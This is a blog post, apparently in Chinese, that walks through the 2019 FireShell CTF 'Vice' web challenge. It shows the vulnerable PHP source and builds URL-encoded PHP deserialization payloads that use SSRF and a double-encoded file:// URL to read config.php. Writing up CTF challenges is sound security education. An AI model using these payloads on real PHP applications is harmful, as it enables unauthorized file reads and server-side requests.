

wywwzjj's Blog

2019 fireshell web Vice

wywwzjj's Blog

2019 fireshell web Vice

Writeup ssrf

字数统计: 586阅读时长: 3 min

 2019/01/30   Share

• 
• 
• 
• 
• 

题目所给源码

<?php
    //require_once 'config.php';
    class SHITS{
    	private $url;
    	private $method;
    	private $addr;
    	private $host;
    	private $name;
    
    	function __construct($method,$url){
    		$this->method = $method;
    		$this->url = $url;
    	}
    
    	function doit(){
    		$this->host = @parse_url($this->url)['host'];
    		$this->addr = @gethostbyname($this->host);
    		$this->name = @gethostbyaddr($this->host);
    		if($this->addr !== "127.0.0.1" || $this->name === false){
    			$not = ['.txt','.php','.xml','.html','.','[',']'];
    			foreach($not as $ext){
    				$p = strpos($this->url,$ext);
    				if($p){
    					die(":)");
    				}
    			}
    			$ch = curl_init();
    			curl_setopt($ch,CURLOPT_URL,$this->url);
    			curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    	
    			$result = curl_exec($ch);
    			echo $result;
    		}else{
    			die(":)");
    		}
    	}
    	
    	function __destruct(){
    		if(in_array($this->method,array("doit"))){
    			call_user_func_array(array($this,$this->method),array());
    		}else{
    			die(":)");
    		}
    	}
    }
    
    if(isset($_GET["gg"])) {
    	@unserialize($_GET["gg"]);
    } else {
    	highlight_file(__FILE__);
    }

打开 config.php ，出现 awn…
猜想 flag 在 config.php 中，并且有访问限制，构造 ssrf 进行访问，然而还是啥都没有，与外网直接访问的界面一样

$not = ['.txt','.php','.xml','.html','.','[',']'];
foreach($not as $ext){
    $p = strpos($this->url,$ext);
    if($p){
        die(":)");
    }
}

此处可构造 绕过方法参考

$gg = new SHITS('doit', '.php@68.183.31.62:991/config.php');
$gg = new SHITS('doit', '.php@localhost/config.php');
$gg = new SHITS('doit', 'localhost/config%2ephp');
$ser = serialize($gg);
echo urlencode($ser) ."<br>";
unserialize($ser);

得到：

O%3A5%3A%22SHITS%22%3A5%3A%7Bs%3A10%3A%22%00SHITS%00url%22%3Bs%3A32%3A%22.php%4068.183.31.62%3A991%2Fco
nfig.php%22%3Bs%3A13%3A%22%00SHITS%00method%22%3Bs%3A4%3A%22doit%22%3Bs%3A11%3A%22%00SHITS%00addr%22%3B
N%3Bs%3A11%3A%22%00SHITS%00host%22%3BN%3Bs%3A11%3A%22%00SHITS%00name%22%3BN%3B%7D

先URL编码，若序列化后直接反序列化，某些特殊符号的编码问题会引起length混乱，出现 unserialize(): Error at offset 错误， 也可以进行其他的编码，比如 base64，但是需要改代码，这里利用 web 特性，url 编码最方便

但是并没有什么卵用

还是得 file:///var/www/html/config%2ephp 二次编码绕过 .

exp：

O%3A5%3A%22SHITS%22%3A5%3A%7Bs%3A10%3A%22%00SHITS%00url%22%3Bs%3A33%3A%22file%3A%2F%2F%2Fvar%2Fwww
%2Fhtml%2Fconfig%252ephp%22%3Bs%3A13%3A%22%00SHITS%00method%22%3Bs%3A4%3A%22doit%22%3Bs%3A11%3A%22
%00SHITS%00addr%22%3BN%3Bs%3A11%3A%22%00SHITS%00host%22%3BN%3Bs%3A11%3A%22%00SHITS%00name%22%3BN%3B%7D

读取 config.php

if($_SERVER['REMOTE_ADDR'] !== '::1' || $_SERVER['REMOTE_ADDR'] !== '127.0.0.1'){
    echo "aaawn";
}else{
    $flag ="F#{wtf_5trp0s_}";
}

观察代码，此处的 ||，能到 else 吗，出题人真阴险 :)

其实可以这样，不需要所有属性，只要前两个

%2F%2F%2Fvar%2Fwww%2Fhtml%2Fconfig%252ephp%22%3Bs%3A13%3A%22%00SHITS%00method%22%3

原文作者：wywwzjj

原文链接：https://wywwzjj.top/2019/01/30/2019-Fireshell-Web-Vice/

发表日期：January 30th 2019, 1:52:46 pm

更新日期：May 15th 2021, 11:53:20 am

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  安恒杯 一月 web
• Previous Post
  POJ 2352 Stars[树状数组]

Powered by Hexo  theme Archer

阅读次数: : )

CATALOG



• Archive
• Tag
• Cate

Total : 63

2022

• 04/30Container (Docker) is Process or Virtual Machine

2021

• 03/25Java 反序列化学习

2020

• 10/10pwnable.kr
• 10/07二进制学习
• 06/23frida 初体验
• 03/22LeetCode Weekly Contest 181
• 03/22LeetCode Weekly Contest 22（双周赛）
• 03/21LeetCode 数据库专题
• 03/08LeetCode Weekly Contest 179
• 03/08LeetCode Weekly Contest 21（双周赛）
• 02/23LeetCode Weekly Contest 177
• 01/30ThinkPHP 3.X / 5.X order by 注入
• 01/24Go 学习
• 01/23PHP-FPM RCE (CVE-2019-11043)
• 01/17ThinkPHP 6.0 任意文件写入

2019

• 12/16CSAPP 并发编程 笔记
• 12/15smarty 3.1.31 RCE（CVE-2017-1000480）
• 12/02CSAPP 网络编程 笔记
• 11/25CSAPP 系统级 IO 笔记
• 11/21ThinkCMF 前台模板注入 RCE
• 11/11CSAPP 虚拟存储器 笔记
• 10/28CSAPP 异常控制流 笔记
• 10/24Python pickle 反序列化实例分析
• 10/21CSAPP 存储器层次结构 笔记
• 10/10CSAPP 程序的机器级表示 笔记
• 10/06Balsn CTF 2019 web 题
• 09/08CSAPP 信息的表示和处理 笔记
• 09/01CSAPP 计算机系统漫游 笔记
• 08/20当 PHP 反序列化遇上 SSRF
• 07/18Discuz ML! V3.X RCE
• 07/11PHP 写配置文件经典问题
• 05/18phar 与反序列化学习
• 05/17Redis 未授权访问相关利用
• 05/12命令注入总结
• 04/07vulnhub 靶机实战系列 HackInOS
• 04/04Leetcode 322.Coin Change[DP]
• 04/02无字母数字 webshell
• 03/02PHP SECURITY CALENDAR Writeup
• 03/01sqlmap tamper 列表
• 02/26Jarvis OJ inject
• 02/25Jarvis OJ phpinfo
• 02/02Hackme-Web-Writeup
• 02/02Jarvis OJ Writeup
• 02/01Prompt 1 to win
• 01/302019 fireshell web Vice
• 01/30安恒杯 一月 web
• 01/02POJ 2352 Stars[树状数组]
• 01/02POJ 2352 Stars[树状数组]

2018

• 12/302017 NJCTF web guess
• 12/30Code Breaking Writeup
• 12/22优雅实现哈夫曼编码
• 12/08Please don't stop rua 233333
• 11/30Docker-常用命令清单
• 11/23漏洞练习平台及工具
• 11/02Sqli-labs 通关笔记
• 10/28POJ 1321 棋盘问题[DFS]
• 10/28POJ 3984 迷宫问题[BFS]
• 10/23Raccoon web Writeup
• 10/02学习一项技能要花多少时间？
• 09/26Bugku Web 部分WP
• 07/28ACM 常用小 Trick
• 05/16Teach Yourself Programming in Ten Years
• 01/25Hello World

Writeup php 伪随机数 算法 ssrf 读书笔记 漏洞分析 PHP Cloud Docker Container 代码审计 SQLi 反序列化 php redis xss ThinkPHP frida smarty 渗透测试 pwn webshell 心得 命令注入 SSRF 笔记 Java SQL



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

